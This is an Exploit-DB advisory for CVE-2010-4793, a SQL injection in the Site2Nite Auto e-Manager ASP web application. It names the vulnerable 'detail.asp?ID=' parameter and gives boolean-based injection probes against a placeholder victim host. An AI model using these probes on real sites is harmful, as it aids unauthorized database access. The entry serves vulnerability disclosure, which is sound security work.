Site2Nite Auto e-Manager SQL Injection Vulnerability

2010-10-10T00:00:00
ID EDB-ID:15230
Type exploitdb
Reporter KnocKout
Modified 2010-10-10T00:00:00

Description

Site2Nite Auto e-Manager SQL Injection Vulnerability. CVE-2010-4793. Webapps exploit for asp platform

                                        
                                            ==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation~~~~~~~~~~~
    
   http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
   http://VICTIM/www/detail.asp?ID=654 and 1=1  {True}
   http://VICTIM/www/detail.asp?ID=654 and 1=0  {False}
   
    ================================

     GoodLuck.